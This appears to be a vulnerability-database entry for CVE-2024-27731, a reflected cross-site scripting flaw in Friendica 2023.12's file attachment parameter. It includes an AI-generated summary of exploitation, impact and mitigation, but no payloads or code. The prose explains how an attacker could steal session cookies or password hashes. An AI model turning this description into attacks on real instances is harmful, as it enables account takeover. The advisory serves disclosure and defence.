CVE-2024-27731
Description
Friendica 2023.12 has a reflected XSS in the file attachment parameter due to missing file type filtering, allowing cookie or password hash theft.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Friendica 2023.12 has a reflected XSS in the file attachment parameter due to missing file type filtering, allowing cookie or password hash theft.
Vulnerability
Friendica version 2023.12 contains a reflected Cross-Site Scripting (XSS) vulnerability in the file attachment parameter. The lack of file type filtering allows an attacker to inject arbitrary JavaScript via a crafted attachment, which executes in the victim's browser [1].
Exploitation
An unauthenticated attacker can exploit this by convincing a victim to interact with a malicious link or upload a specially crafted file. The injected script executes when the victim accesses the attachment or the relevant page, potentially combined with CSRF to perform actions on the victim's behalf [1].
Impact
Successful exploitation enables the attacker to steal the administrator's session cookie or a regular user's password hash, leading to account takeover and potential compromise of the entire Friendica instance [1].
Mitigation
No official patch has been released as of the disclosure date. Users should upgrade to a patched version if available, or implement input sanitization for file attachments. The vendor was notified but the fix status remains unknown [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE — mechanics is only generated when we can read the actual fix diff. Without that, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References
2News mentions
0No linked articles in our index yet.